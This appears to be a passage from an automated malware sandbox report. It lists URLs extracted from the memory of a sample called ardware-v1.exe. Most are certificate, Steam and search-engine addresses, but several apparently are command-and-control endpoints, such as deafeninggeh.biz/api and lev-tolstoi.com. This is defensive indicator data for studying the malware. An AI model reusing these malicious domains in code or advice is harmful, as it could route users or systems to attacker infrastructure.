Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ardware-v1.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: ardware-v1.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com00
                Source: ardware-v1.exeString found in binary or memory: http://ocsps.ssl.com0?
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apii
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastJ
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.ste
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publ
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ardware-v1.exe, 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121904160.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121509766.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3153091558.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstb
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/PK
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api1
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001707867.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/BVC$O
Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/S$_
Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152694533.000000000358C000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199578704.0000000003596000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3122120074.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3119331839.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219548892.0000000003597000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 